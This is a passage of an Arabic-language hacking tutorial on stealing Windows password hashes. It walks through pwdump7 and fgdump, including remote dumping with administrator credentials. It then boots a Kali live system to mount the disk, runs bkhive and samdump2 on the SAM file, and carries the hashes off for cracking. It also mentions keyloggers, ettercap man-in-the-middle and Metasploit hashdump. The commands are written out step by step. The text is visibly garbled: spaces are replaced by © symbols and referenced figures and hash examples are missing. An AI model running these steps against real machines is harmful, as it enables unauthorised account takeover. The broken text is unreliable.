ﺧﻼل ﺑﯾﺎﻧﺎت اﻟدﺧول ،ﻓﺎن Keyloggersﺗﻠﻘﺎﺋﯾﺎ ﺗﻘوم ﺑﺈرﺳﺎل ﺑﯾﺎﻧﺎت اﻟدﺧول )اﺳم اﻟﻣﺳﺗﺧدم وﻛﻠﻣﺎت اﻟﺳر( إﻟﻰ اﻟﻣﮭﺎﺟم دون ﻋﻠم اﻟﺿﺣﯾﺔ.
ﺑﻣﺟرد ﺣﺻول اﻟﻣﮭﺎﺟم ﻋﻠﻰ ھذه اﻟﺑﯾﺎﻧﺎت اﻋﺗﻣﺎد ﻋﻠﻰ ﺗﺳﺟﯾل دﺧول اﻟﺿﺣﯾﺔ ،ﻓﺎﻧﮫ ﯾﻘوم ﺑﺗﺳﺟﯾل اﻟدﺧول إﻟﻰ ﺧﺎدم اﻟدوﻣﯾن ورﺑﻣﺎ اﻟﻘﯾﺎم ﺑﺄي
ﻋﻣل أﺧر.
ﻣﻌظم اﻟﻧظم اﻟﺗﻲ ﺗﺳﺗﺧدم آﻟﯾﺔ ﻣﺻﺎدﻗﺔ ﻛﻠﻣﺔ اﻟﻣرور ﺗﺣﺗﺎج إﻟﻰ ﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﻣرور ھذه )أو اﻟﮭﺎش اﻟﺧﺎﺻﺔ ﺑﮭم( ﻣﺣﻠﯾﺎ ﻋﻠﻰ اﻟﺟﮭﺎز.
وھذا ﺻﺣﯾﺢ ﺑﺎﻟﻧﺳﺑﺔ ﻷﻧظﻣﺔ اﻟﺗﺷﻐﯾل )وﯾﻧدوز ،ﻟﯾﻧﻛس ،وﺳﯾﺳﻛو( ،وأﺟﮭزة اﻟﺷﺑﻛﺔ ) routerو ،(switchاﻟﺦ.
وﻏﺎﻟﺑﺎ ﻣﺎ ﯾوﺟﮫ اﻟﻣﮭﺎﺟﻣﯾن ھو اﻟﺣﺻول ﻋﻠﻰ اﻟﮭﺎش ﻣن اﻟﻣﻠف SAMاﻣﺎ ﻹﻋداد ﺧﺎطﻲ او اﺧﺗراق ﻧﺎﺟﺢ .وﻛﻣﺎ ﻗﻠﻧﺎ ﺳﺎﺑﻘﺎ ان اﻟﺣﺻول
ﻋﻠﻰ اﻟﮭﺎش ﯾﻌد ﻧﺻف اﻟﻣﻌرﻛﺔ .ﻛﻤﺎ ﻗﻠﻨﺎ ﺳﺎﺑﻘﺎ ان اﻟﻤﻠﻒ SAMﯾﺘﻤﺘﻊ ﺑﺎﻟﻜﺜﯿﺮ ﻣﻦ اﻟﺤﻤﺎﯾﺔ ﻣﻦ ﻗﺒﻞ ﻧﻈﺎم اﻟﺘﺸﻐﯿﻞ وﯾﻨﺪوز .ﻟﺤﺴﻦ اﻟﺤﻆ ،ھﻨﺎك
طﺮﯾﻘﺔ ﻟﺘﺠﺎوز ھﺬه اﻟﻘﯿﻮد ﻋﻠﻰ ﺣﺪ ﺳﻮاء.
) The Local Security Authority Subsystem (LSASSﯾﻌﻣل ﻣﻊ اﻣﺗﯾﺎز اﻟوﺻول اﻟﺿرورﯾﺔ ﻟﮭذا اﻟﻣﻠف ،ﻟذﻟك ﯾﺳﺗﺧدم
pwdumpﺗﻘﻧﯾﺔ ﺗﻌرف ﺑﺎﺳم DLL injectionواﻟﺗﻲ ﺗﻌﻣل ﺗﺣت ﻋﻣﻠﯾﺔ LSASSوﺑﺎﻟﺗﺎﻟﻲ ﺗﻣﻠك اﻣﺗﯾﺎز اﻟوﺻول إﻟﻰ ﻣﻌﻠوﻣﺎت اﻟﮭﺎش.
Pwdump7ھو ﺗطﺑﯾﻖ ﯾﻌﻣل ﻋﻠﻰ ﺗﻔرﯾﻎ ھﺎش ﻛﻠﻣﺎت اﻟﻣرور ) (OWFSﻣن ﻗﺎﻋدة ﺑﯾﺎﻧﺎت Pwdump .NT’s SAMﯾﻌﻣل ﻋﻠﻰ ﺗﻔرﯾﻎ
ھﺎﺷﺎت ﻛﻠﻣﺎت اﻟﻣرور ) (LM and NTLMﻣن ﺣﺳﺎﺑﺎت اﻟﻣﺳﺗﺧدﻣﯾن اﻟﻣﺣﻠﯾﯾن ﻣن اﻟﻣﻠف ) .(SAMھذا اﻟﺗطﺑﯾﻖ أو اﻷداة ،ﯾﺗم ﺗﺷﻐﯾﻠﮭﺎ
ﻋن طرﯾﻖ اﺳﺗﺧراج اﻟﻣﻠف SAMواﻟﻣﻠف SYSTEMﻣن ﻧظﺎم اﻟﻣﻠﻔﺎت وﻣن ﺛم ﯾﺗم اﺳﺗﺧراج اﻟﮭﺎش ﻣﻧﮫ .واﺣدة ﻣن اﻟﻣﯾزات اﻟﻘوﯾﺔ ﻣن
pwdump7ھو أﻧﮫ ﻗﺎدر أﯾﺿﺎ ﻋﻠﻰ ﺗﻔرﯾﻎ اﻟﻣﻠﻔﺎت اﻟﻣﺣﻣﯾﺔ .اﺳﺗﺧدام ھذا اﻟﺑرﻧﺎﻣﺞ ﯾﺗطﻠب اﻣﺗﯾﺎزات إدارﯾﺔ ﻋﻠﻰ اﻟﻧظﺎم اﻟﺑﻌﯾد.
ﻣﻠﺣوظﮫ :ﻋﻧد اﻟﺗﻌﺎﻣل ﻣﻊ دوﻣﯾن active directoryﻓﺎﻧﮫ ﯾﻘوم ﺑﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﻣرور ﻓﻲ اﻟﻣﻠف).(ntds.dit
-ﻧﻘوم اﻻن ﺑﺗﺷﻐﯾل اﻷداة pwdump7وذﻟك ﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ pwdump7.exeﻓﻲ ﺳطر اﻷواﻣر ﺑدون أي ﺗﻌﺑﯾرات ﻣﻊ اﻟﻧﻘر
ﻓوق .Enter
-ھذا ﺳوف ﯾؤدى اﻟﻰ اظﮭﺎر ﺟﻣﯾﻊ اﻟﮭﺎﺷﺎت اﻟﻣﺳﺟﻠﺔ ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟوﯾﻧدوز أي ﻣن اﻟﻣﻠف SAMﻛﺎﻻﺗﻰ:
-ﻧﻘوم ﺑﺗﺧزﯾن ھذه اﻟﮭﺎش اوى ﺑﻣﻌﻧﻰ اﺧر ﻣﺣﺗوﯾﺎت اﻟﻣﻠف SAMﻓﻲ ﻣﻠف اﺧر وﯾﻛون ﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ > pwdump7.exe
c:\hashes.txtﺛم اﻟﻧﻘر ﻋﻠﻰ .Enter
-ﺣﯾث ﯾﻘوم ھذا اﻻﻣر ﺑطﺑﺎﻋﺔ ﻣﺣﺗوﯾﺎﺗﮫ اﻟﻰ ﻣﻠف ﻧﺻﻲ ﻏﯾر ﻣﺣﻣﻰ ﯾﻣﻛﻧك اﻻطﻼع ﻋﻠﯾﮫ.
-وھذا ھو وظﯾﻔﺔ ھذه اﻷداة وھو اﺳﺗﺧراج ﻣﺣﺗوﯾﺎت اﻟﻣﻠف .SAM
-ھذه اﻷداة ﻣﺗوﻓرة أﯾﺿﺎ ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﺊ.
اﻟﺻﯾﻐﺔ اﻟﻌﺎﻣﺔ ﻟﮭذه اﻷداة ﻛﺎﻻﺗﻰ:
)pwdump7.exe (Dump system passwords
)pwdump7.exe -s <samfile> <systemfile> (Dump passwords from files
)pwdump7.exe -d <filename> [destination] (Copy filename to destination
)pwdump7.exe -h (Show this help
Fgdumpأداه اﺧرى ﻟﺗﻔرﯾﻎ ﻛﻠﻣﺎت اﻟﻣرور ﻋﻠﻰ أﺟﮭزة وﯾﻧدوز .NT/2000/XP/2003/Vistaﺗﺄﺗﻲ ﻣدﻣﺟﺔ ﻣﻊ اﻟﻧظﺎم وﻟدﯾﮭﺎ ﻛل ﻗدرات
Pwdumpوﯾﻣﻛﻧﮭﺎ أﯾﺿﺎ اﻟﻘﯾﺎم ﺑﻌدد ﻣن اﻷﻣور اﻟﺣﯾوﯾﺔ اﻷﺧرى ﻣﺛل ﺗﻧﻔﯾذ اﻟﻣﻠﻔﺎت اﻟﻘﺎﺑﻠﺔ ﻟﻠﺗﻧﻔﯾذ ﻋن ﺑﻌد وﺗﻔرﯾﻎ ﻣﺣﺗوى أﻗراص اﻟﺗﺧزﯾن
اﻟﻣﺣﻣﯾﺔ ﺳواء ﻣن ﻋﻠﻰ ﺑﻌد أو ﻣﺣﻠﯾﺎ.
ھذﯾن اﻻداﺗﯾن ﯾﻣﻛﻧﮭﻣﺎ ﺗﻔرﯾﻎ اﻟﻣﻠف SAMﻣن ﻋﻠﻰ اﻷﻧظﻣﺔ ﻋن ﺑﻌد أﯾﺿﺎ ﺑﺎﺳﺗﺧدام اﻟﺻﯾﻎ اﻷﺗﯾﺔ:
]C:\> fgdump.exe -h 192.168.0.10 -u An_Administrative_User [-p password
C:\> pwdump6.exe -u An_Administrative_User [-p password] 192.168.0.10
وﯾﺟب ان ﻧﺿﻊ ﻓﻲ اﻋﺗﺑﺎرﻧﺎ أن أي ﻣﺳﺗﺧدم ﻟﻛﻲ ﯾﺳﺗﺧدم ﻟﺗﻧﻔﯾذ ﺗﻔرﯾﻎ ھﺎش ﻛﻠﻣﺔ اﻟﻣرور ﻣن اﻟﻣﻠف SAMﺳوف ﯾﺣﺗﺎج اﻟﻰ ﺗﺻرﯾﺢ اﻋﺗﻣﺎد
إدارﯾﺔ .ﻓﻲ ھذا اﻟﺳﯾﻧﺎرﯾو ،ﺳﯾطﻠب ﻣﻧك إدﺧﺎل ﻛﻠﻣﺔ اﻟﺳر ﻗﺑل ﺑدء ﺗﻔرﯾﻎ ﻛﻠﻣﺔ اﻟﻣرور.
اﻻﻣر Fgdumpﺳوف ﯾﻘوم ﺑﺗﺧزﯾن اﻟﮭﺎش ﻓﻲ اﻟﻣﻠف ][*.fgdump؛ أﻣﺎ pwdump7ﺳوف ﯾﻔرغ ﻣﺣﺗوﯾﺎت SAMإﻟﻰ اﻟﺷﺎﺷﺔ .وﻟﻛن
ﻣﺎذا ﺗﻔﻌل إذا ﻛﺎن ﻟﯾس ﻟدﯾك وﺻول ﻣﺑﺎﺷر ﻟﻠﻧظﺎم اﻟﮭدف ،أو ﻻ ﺗﻣﻠك ﺻﻼﺣﯾﺎت ﻣدﯾر اﻟﻧظﺎم ﻟﺗﻧﻔﯾذ ھذا اﻻﻣر ﺣﯾث ان اﻟﮭدف ﻣن اﺳﺗﺧداﻣﮫ
ھﻲ اﻟوﺻول اﻟﻰ ﺻﻼﺣﯾﺎت ﻣدﯾر اﻟﻧظﺎم.
ﻟﺣﺳن اﻟﺣظ ،ھﻧﺎك طرﯾﻘﺔ ﻟﺗﺟﺎوز ھذه اﻟﻘﯾود ﻋﻠﻰ ﺣد ﺳواء .ﻷﻧﻧﺎ ﻧﻧﺎﻗش اﻟﮭﺟﻣﺎت اﻟﻣﺣﻠﯾﺔ وﻷن ﻟدﯾﻧﺎ اﻟوﺻول اﻟﻔﻌﻠﻲ إﻟﻰ اﻟﻧظﺎم ،وأﺑﺳط
طرﯾﻘﺔ ﻟﺗﺟﺎوز ھذه اﻟﺣﻣﺎﯾﺔ ھو اﻟﺗﻣﮭﯾد ﻟﻧظﺎم ﺗﺷﻐﯾل ﺑدﯾل ﻣﺛل ﻛﺎﻟﻲ .ﺑواﺳطﺔ ﺗﻣﮭﯾد ھدﻓﻧﺎ ﻟﻧظﺎم اﻟﺗﺷﻐﯾل اﻟﺑدﯾل ،ﻓﻧﺣن ﻗﺎدرون ﻋﻠﻰ ﺗﺟﺎوز
ﺗﺄﻣﯾن .Windows SAMھذا ﻣﻣﻛن ﻷن ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ﻻ ﯾﺑدأ ،اﻟﻘﻔل ﻟن ﯾﻌﻣل أﺑدا ،وﻧﺣن أﺣرار ﻓﻲ اﻟوﺻول إﻟﻰ اﻟﻣﻠف .SAM
وﻟﻛن ﻟﻸﺳف ،ﻻ ﯾزال ﺗﺷﻔﯾر اﻟﻣﻠف ،SAMﻟذﻟك ﻧﺣن ﺑﺣﺎﺟﺔ إﻟﻰ اﺳﺗﺧدام أداة ﻟﻠوﺻول إﻟﻰ اﻟﮭﺎش .ﻟﺣﺳن اﻟﺣظ ،ھذه اﻷداة اﻟﻣطﻠوﺑﺔ
ﻣدﻣﺟﺔ ﻓﻲ اﻟﻧظﺎم ﻛﺎﻟﻲ.
ﻣﻠﺣوظﮫ :ھﻧﺎك اﻟﻌدﯾد ﻣن اﻟطرق اﻟﻣﺧﺗﻠﻔﺔ ﻹﻗﻼع )(bootاﻟﮭدف ﺑﻧظﺎم اﻟﺗﺷﻐﯾل اﻟﺑدﯾل .أﺳﮭل اﻟطرق ﻋﺎدة ﻣﺎ ﺗﻧطوي ﻋﻠﻰ ﺗﺣﻣﯾل
اﻻﺻدار " ."Live CD\DVDﺛم ﯾﺗم ﻧﺳﺧﮭﺎ إﻟﻰ أﺳطواﻧﺔ اﻗراص ،واﻟﺗﻲ ﯾﻣﻛن إدراﺟﮭﺎ ﻓﻲ ﻣﺣرك اﻷﻗراص اﻟﺿوﺋﯾﺔ ﻣن اﻟﺟﮭﺎز
اﻟﮭدف .ﺣﯾث أن اﻟﻌدﯾد ﻣن أﻧظﻣﺔ ﻣﺣرﻛﺎت اﻷﻗراص ﺳوف ﺗﺗﺣﻘﻖ ﻣن وﺟد أي أﻗراص ﺿوﺋﯾﺔ ﺑﮭﺎ ﺛم ﺗﻠﻘﺎﺋﯾﺎ ﺗﻘوم ﺑﺗﺷﻐﯾﻠﮭﺎ .إذا ﻟم ﯾﻛن
اﻟﻧظﺎم اﻟﮭدف اﻟﺧﺎص ﺑك ﯾﻘوم ﺑﺗﺷﻐﯾل اﻷﻗراص اﻟﺿوﺋﯾﺔ ﺗﻠﻘﺎﺋﯾﺎ ،ﻓﯾﻣﻛﻧك اﺳﺗﺧدام ﺗرﻛﯾﺑﺔ ﻣن اﻟﻣﻔﺎﺗﯾﺢ ﻋﻠﻰ ﺣﺳب ﻧوع BIOSاﻟﻣﺳﺗﺧدم
) (F9 in HP Lapﻟﺗﻐﯾﯾر ﺗرﺗﯾب اﻟﺗﻣﮭﯾد أو اﻟدﺧول اﻟﻰ إﻋدادات BIOSﻟﺟﻌل اﻹﻗﻼع ﺑﯾدا ﻣن ﺧﻼل ﻣن ﻣﺣرك اﻷﻗراص اﻟﺿوﺋﯾﺔ.
ﻓﻲ ﺣﺎل ﻟم ﯾﻛن ﻟدﯾك ﻓﻲ اﻟﻧظﺎم اﻟذي ﺗﺳﺗﮭدﻓﮫ ﻣﺣرك أﻗراص ﺿوﺋﯾﺔ ،ﯾﻣﻛﻧك أﯾﺿﺎ اﺳﺗﺧدام UNetbootinﻹﻧﺷﺎء ﻣﺣرك أﻗراص
USBﻟﻠﺗﻣﮭﯾد UNetbootin .ﯾﺳﻣﺢ ﻟك ﻟﺟﻌل إﺻدارات ﻟﯾﻧﻛس ﻛﺎﻟﻲ " "liveو اﻟﻌدﯾد ﻣن اﻟﺗوزﯾﻌﺎت اﻷﺧرى .اﻟﺟﻣﻊ ﺑﯾن
UNetbootinﻣﻊ ﻛﺎﻟﻲ ISOﯾﺳﻣﺢ ﻟك ﺑﺗﺷﻐﯾل ﻧظﺎم اﻟﺗﺷﻐﯾل ﺑﺄﻛﻣﻠﮫ ﻣن ﻣﺣرك ،USBﻣﻣﺎ ﯾﺧﻠﻖ ﻣﺟﻣوﻋﺔ أدوات ﻗوﯾﺔ ﺟدا،
وﻣﺣﻣوﻟﺔ .ﻛﻣﺎ ھو اﻟﺣﺎل ﻣﻊ ،live CD / DVDﻗد ﺗﺣﺗﺎج ﻟﺗﻐﯾﯾر ﺗرﺗﯾب اﻟﺗﻣﮭﯾد ﻟﻧظﺎم اﻟﺿﺣﯾﺔ ﻗﺑل اﺳﺗﮭداﻓﮭﺎ.
-ﺑﻌد ﺗﻣﮭﯾد اﻟﻧظﺎم اﻟﮭدف إﻟﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟﺑدﯾل ،ﻓﺈن أول ﺷﻲء ﻋﻠﯾك اﻟﻘﯾﺎم ﺑﮫ ھو ﺗﺣﻣﯾل ﻣﺣرك اﻷﻗراص اﻟﺛﺎﺑت اﻟﻣﺣﻠﻲ .ﺗﺄﻛد
ﻣن ﺗﺣﻣﯾل ﻣﺣرك اﻷﻗراص اﻟذي ﯾﺣﺗوي ﻋﻠﻰ ﻣﺟﻠد .Windowsﯾﻣﻛﻧﻧﺎ ﺗﺣﻘﯾﻖ ذﻟك ﻣن ﺧﻼل ﻓﺗﺢ اﻟﺗرﻣﻧﺎل وﻛﺗﺎﺑﺔ اﻻﺗﻲ:
#mount©-t©ntfs-3g©-o©rw©/dev/sda1©/mnt/sda1
ﻣن اﻟﻣﮭم أن ﺗﻘوم ﺑﺗﺣﻣﯾل ﻣﺣرك اﻷﻗراص اﻟﺻﺣﯾﺢ وﻟﯾس ﻛل اﻷﻧظﻣﺔ اﻟﻣﺳﺗﮭدﻓﺔ ﺳﯾﻛون ﻟﮭﺎ ./dev/sda1إذا ﻛﻧت ﻏﯾر ﻣﺗﺄﻛد أي ﻣن
اﻟﻣﺣرﻛﺎت اﻟﺗﻲ ﺗﺣﻣل ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز واﻟﺗﻲ ﺗﺣﺗﺎج اﻟﻰ ﺗﺣﻣﯾﻠﮭﺎ ﻋﻠﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟﺑدﯾل ،ﻓﯾﻣﻛﻧك ﺗﺷﻐﯾل اﻷﻣر " "fdisk -lﻣن ﺧﻼل
اﻟﺗرﻣﻧﺎل .ﺳﺗﻘوم اﻷداة fdiskﺑﺳرد ﻛﺎﻓﺔ ﻣﺣرﻛﺎت اﻷﻗراص اﻟﻣﺗوﻓرة ﻋﻠﻰ اﻟﻧظﺎم اﻟﺗﻲ ﺗﺳﺗﮭدﻓﮭﺎ ،وﯾﻧﺑﻐﻲ أن ﺗﺳﺎﻋدك ﻓﻲ ﺗﺣدﯾد ﻣﺣرك
اﻷﻗراص اﻟذي ﺗﺣﺗﺎج إﻟﻰ ﺗﺣﻣﯾﻠﮫ) .(mountﻗد ﺗﺣﺗﺎج أﯾﺿﺎ إﻟﻰ إﻧﺷﺎء ﻧﻘطﺔ اﻟﺗﺣﻣﯾل ) (mount pointﻓﻲ اﻟﻣﺟﻠد /mntﺣﯾث ﺳوف ﯾﻛون
اﻟﺑواﺑﺔ اﻟﻰ اﻟﻣﺣرك اﻟذي ﯾﺣﻣل ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز.
-ﻟﻠﻘﯾﺎم ﺑذﻟك ،ﯾﻣﻛﻧك ﺑﺑﺳﺎطﺔ اﺳﺗﺧدام اﻷﻣر ":"mkdir
#mkdir©/mnt/sda1
ﺑﻣﺟرد اﻻﻧﺗﮭﺎء ﻣن ﺗرﻛﯾب ﻣﺣرك اﻷﻗراص اﻟﻣﺣﻠﻲ ﺑﻧﺟﺎح ﻓﻲ ﻛﺎﻟﻲ ،ﻓﺳوف ﺗﻛون ﻗﺎدرا ﻋﻠﻰ ﺗﺻﻔﺢ اﻟﻣﺣرك اﻟذي ﯾﺣﻣل ﻧظﺎم اﻟﺗﺷﻐﯾل
وﯾﻧدوز "\ ."C:ﯾﺟب أن ﺗﻛون اﻵن ﻗﺎدرا ﻋﻠﻰ اﻟﺗﻧﻘل إﻟﻰ ﻣﻠف .SAM
-ﯾﻣﻛﻧك اﻟﻘﯾﺎم ﺑذﻟك ﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ اﻷﻣر اﻟﺗﺎﻟﻲ ﻓﻲ اﻟﺗرﻣﻧﺎل:
#cd©/mnt/sda1/Windows/system32/config
إذا ﻧﻔذ ﻛل ﺷﻲء ﻛﻣﺎ ھو ﻣﺧطط ﻟﮫ ،ﯾﺟب أن ﺗﻛون ﻓﻲ اﻟﻣﺟﻠد اﻟذي ﯾﺣﺗوي ﻋﻠﻰ اﻟﻣﻠف .SAMﻟﻌرض ﻣﺣﺗوﯾﺎت اﻟﻣﺟﻠد اﻟﺣﺎﻟﻲ ﻧﺳﺗﺧدم اﻻﻣر
lsﻓﻲ إطﺎر اﻟﺗرﻣﻧﺎل ،ﯾﺟب أن ﺗﺷﺎھد ﻣﻠف .SAMﯾﺑﯾن اﻟﺷﻛل اﻟﺗﺎﻟﻲ ﻟﻘطﺔ ﻟﻌرض ﻛل اﻟﺧطوات اﻟﻣطﻠوﺑﺔ ﻟﺗﺣدﯾد ﻣوﻗﻊ اﻟﻣﻠف .SAM
1
2
3
4
5
6
اﻵن ﺑﻌد أن ﻗﻣﻧﺎ ﺑﺈﯾﺟﺎد اﻟﻣﻠف ،SAMﯾﻣﻛﻧﻧﺎ اﺳﺗﺧدام أداة ﺗﺳﻣﻰ Samdump2ﻻﺳﺗﺧراج اﻟﮭﺎش .ﻋﻧد ھذه اﻟﻧﻘطﺔ ﻟدﯾﻧﺎ اﻟﻘدرة ﻋﻠﻰ رؤﯾﺔ
وﻧﺳﺦ اﻟﻣﻠف ،SAMﻓﻲ اﻟواﻗﻊ اﻟﺗﻐﻠب ﻋﻠﻰ ﻣﯾزة اﻷﻣن أوﻻ ،وﻟﻛن ﻻ ﯾزال ﺗﺷﻔﯾر اﻟﻣﻠف .SAMﻣن أﺟل ﻋرض ﻧﺳﺧﺔ ﻏﯾر ﻣﺷﻔرة ﻣن
اﻟﻣﻠف ،SAMﻓﻧﺣن ﺑﺣﺎﺟﺔ ﻟﺗﺷﻐﯾل Samdump2. Samdump2ﯾﺳﺗﺧدم ﻣﻠف ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﻣﺣﻠﻲ ﯾﺳﻣﻰ " "systemﻟﻔك ﺗﺷﻔﯾر اﻟﻣﻠف
.SAMﻟﺣﺳن اﻟﺣظ ،اﻟﻣﻠف " "systemﯾﻘﻊ ﻓﻲ ﻧﻔس اﻟﻣﺟﻠد اﻟذي ﯾﻘﻊ ﻓﯾﮫ اﻟﻣﻠف .SAM
ﻟﺗﺷﻐﯾل ،Samdump2ﻓﻧﻛﺗب اﻷﻣر " "samdump2ﻣﺗﺑوﻋﺎ ﺑﺎﺳم وﻣوﻗﻊ اﻟﻣﻠف " ،”systemﯾﻠﯾﮫ اﺳم وﻣوﻗﻊ اﻟﻣﻠف SAMاﻟذي ﻧرﯾد
ﻋرض ﻣﺣﺗوﯾﺎﺗﮫ.
-ﻋﻧد ھذه اﻟﻧﻘطﺔ ،ﻓﻧﺣن ﯾﻣﻛن اﺳﺗﺧراج ﻣﺣﺗوﯾﺎت اﻟﻣﻠف SAMﻋن طرﯾﻖ ﺗﺷﻐﯾل اﻷﻣر اﻟﺗﺎﻟﻲ ﻓﻲ اﻟﺗرﻣﻧﺎل:
#samdump2©system©SAM©>©/tmp/hash.txt
ﺣﯾث ان اﻻﻣر samdump2ﺳوف ﯾﻘوم ﺑﻧﺳﺦ ﻣﺣﺗوﯾﺎت اﻟﻣﻠف SAMاﻟﻰ اﻟﻣﻠف /tmp/hash.txtاﻟﻐﯾر ﻣﺣﻣﻰ.
ﻣﻠﺣوظﮫ :اﻟوﺻول إﻟﻰ اﻟﮭﺎش ﻓﻲ ﺑﻌض أﻧظﻣﺔ اﻟوﯾﻧدوز ﻗد ﺗﺗطﻠب ﺧطوة إﺿﺎﻓﯾﺔ Bkhive .ھو اﻷداة اﻟﺗﻲ ﺗﺳﻣﺢ ﻟك ﺑﺎﺳﺗﺧراج
) (Syskey bootkeyﻣن اﻟﻣﻠف .systemﻗد ﯾﻛون ﻣن اﻟﺿروري اﺳﺗﺧدام bkhiveﻻﺳﺗﺧراج ﻣﻔﺗﺎح اﻟﻧظﺎم ﻣن أﺟل اﻟﻛﺷف اﻟﺗﺎم
ﻋن ھﺎﺷﺎت ﻛﻠﻣﺔ اﻟﻣرور.
ﻟﺗﺷﻐﯾل ، bkhiveﻓﻧﺣن ﻓﻲ ﺣﺎﺟﺔ ﻟﺗوﻓﯾر ﻧظﺎم اﻟﻣﻠﻔﺎت واﺳم اﻟﻣﻠف اﻟﻧﺎﺗﺞ واﻟﺗﻲ ﺳوف ﯾﺣﺗوي ﻋﻠﻰ اﻟﻣﻔﺗﺎح اﻟﻣﺳﺗﺧرﺟﺔ .ﻟﺣﺳن اﻟﺣظ،
وﻛﻣﺎ ذﻛر ،ﻓﺈن ﻣﺎﯾﻛروﺳوﻓت ﻧوع ﻣﺎ ﯾﻛﻔﻲ ﻟﻠﺣﻔﺎظ ﻋﻠﻰ اﻟﻣﻠف " "systemاﻟﻣﻠف ﻓﻲ ﻧﻔس اﻟﻣﺟﻠد اﻟذي ﯾوﺟد ﻓﯾﮫ اﻟﻣﻠف .SAMﻛﻣﺎ
ﻧوﻗش ﺳﺎﺑﻘﺎ ،وﻋﺎدة ﻣﺎ ﯾوﺟد ھذا اﻟﻣﻠف ﻓﻲ اﻟﻣﺟﻠد. Windows/system32/config
ﻋﻠﻰ اﻓﺗراض إﻧك ﺑﺎﻟﻔﻌل ﻓﻲ اﻟﻣﺟﻠد اﻟذي ﯾﺣﺗوي ﻋﻠﻰ اﻟﻣﻠف systemوﻣﻠﻔﺎت ،SAMﯾﻣﻛﻧك اﻻﺳﺗﻔﺎدة bkhiveﻻﺳﺗﺧراج اﻟﻣﻔﺗﺎح ﻣﻊ
اﻷﻣر اﻟﺗﺎﻟﻲ:
#bkhive system sys_key.txt
ﻋﻧد ھذه اﻟﻧﻘطﺔ ﯾﻣﻛﻧﻧﺎ ﻣواﺻﻠﺔ ھﺟوﻣﻧﺎ ﺑﺎﺳﺗﺧدام .Samdump2ﻓﻲ ھذه اﻟﺣﺎﻟﺔ ،ﻓﺳوف ﯾﺳﺗﻔﺎد Samdump2ﻣن اﻟﻣﻠف
sys_key.txtاﻟﺗﻲ أﻧﺷﺋت ﺣدﯾﺛﺎ ﻟدﯾﻧﺎ ﻛﻣﺎ ھو ﻣﺑﯾن أدﻧﺎه.
#samdump2 SAM sys_key.txt > /tmp/hash.txt
اﻵن ﻟدﯾﻧﺎ ھﺎش ﻛﻠﻣﺔ اﻟﻣرور اﻟﻣﺣﻔوظﺔ ،ﻓﻧﺣن ﺑﺣﺎﺟﺔ إﻟﻰ ﻧﻘﻠﮭﺎ ﻣن اﻟﻘرص ﻛﺎﻟﻲ اﻟﺣﻲ .وﯾﻣﻛن أن ﯾﺗم ھذا ﺑﺑﺳﺎطﺔ ﻋن طرﯾﻖ إرﺳﺎل اﻟﻣﻠف
hash.txtﻋن طرﯾﻖ اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﯾﺔ ﻟﻧﻔﺳك أو إدراج ﻣﺣرك أﻗراص USBوﺧﻠﻖ ﻧﺳﺧﺔ ﻣﺣﻠﯾﺔ ﻣن اﻟﮭﺎش .ﻓﻲ ﻛﻠﺗﺎ اﻟﺣﺎﻟﺗﯾن ،ﺗﺄﻛد ﻣن
ﺣﻔظ اﻟﻣﻠف hashes.txtﻷﻧك ﺗﻌﻣل ﻣن ﻗرص ﻣﺿﻐوط " "Live CDواﻟﺗﻐﯾﯾرات ﻟﯾﺳت ﻣﺳﺗﻣرة .وھذا ﯾﻌﻧﻲ إﻧﮫ ﻋﻧد إﻋﺎدة ﺗﺷﻐﯾل اﻟﺟﮭﺎز
اﻟﮭدف ،ﺳﺗزول ﺟﻣﯾﻊ اﻟﻣﻠﻔﺎت اﻟﺗﻲ ﺗم إﻧﺷﺎؤھﺎ ﻓﻲ اﻟﻘرص ﻛﺎﻟﻲ .ﻣﻊ ﻣﻠف ھﺎش ﻛﻠﻣﺔ اﻟﺳر ﻟﻠﻧظﺎم اﻟﺗﻲ ﺗﺳﺗﮭدﻓﮫ ﻓﻲ ﻣﺗﻧﺎول اﻟﯾد ،ﯾﻣﻛﻧك اﻟﺑدء
ﻓﻲ ﻋﻣﻠﯾﺔ ﻛﺳر ﻛﻠﻣﺎت اﻟﺳر.
ﻣﻠﺣوظﮫ:
ﻗد ﻗﻠﻧﺎ ﻣن ﻗﺑل اﻧﮫ ﯾوﺟد ﻧوﻋﯾن ﻣن اﻟﮭﺎش ،ﺣﯾث اﻧﮫ ﻋﻧدﻣﺎ ﯾﻛون اﻟﮭﺎش LMﻣﻔﻌل ﻣﺛل أﻧظﻣﺔ اﻟﺗﺷﻐﯾل XPواﻻﺻدارات اﻷﻗل ﻓﺎن ﺷﻛل
اﻟﮭﺎش ﺳوف ﯾﻛون ھﻛذا.
اﻣﺎ إذا ﻛﺎن اﻟﮭﺎش LMﻏﯾر ﻣﻔﻌل ﻛﻣﺎ ﻓﻲ إﺻدارات وﯾﻧدوز ﻓﺳﺗﺎ و 7واﻻﺻدارات اﻻﺣدث ﻓﯾﻛون ﺷﻛل اﻟﮭﺎش ﻛﺎﻻﺗﻰ:
ﺣﯾث ﯾﻣﻛﻧك اﺳﺗﺧدام ettercapوھﺟﻣﺎت رﺟل ﻓﻲ اﻟﻣﻧﺗﺻف ﻟﻠﺗﺟﺳس ﻋﻠﻰ اﺳم اﻟﻣﺳﺗﺧدم وﻛﻠﻣﺔ اﻟﻣرور ﻋﺑر اﻟﺷﺑﻛﺔ .ﺳوف ﻧﺗطرق ﻟﺷرح
ettercapﻻﺣﻘﺎ .ھﻧﺎك اﻟﻛﺛﯾر اﻟذي ﯾﻣﻛن اﻟﻘﯾﺎم ﺑﮫ ﺑواﺳطﺔ ettercapوھﻧﺎك اﻟﻌدﯾد ﻣن اﻟدروس اﻟﺗﻲ ﺗﻐطﻲ ﻛﯾﻔﯾﺔ اﺳﺗﺧداﻣﮭﺎ!
Metasploit / hashdump
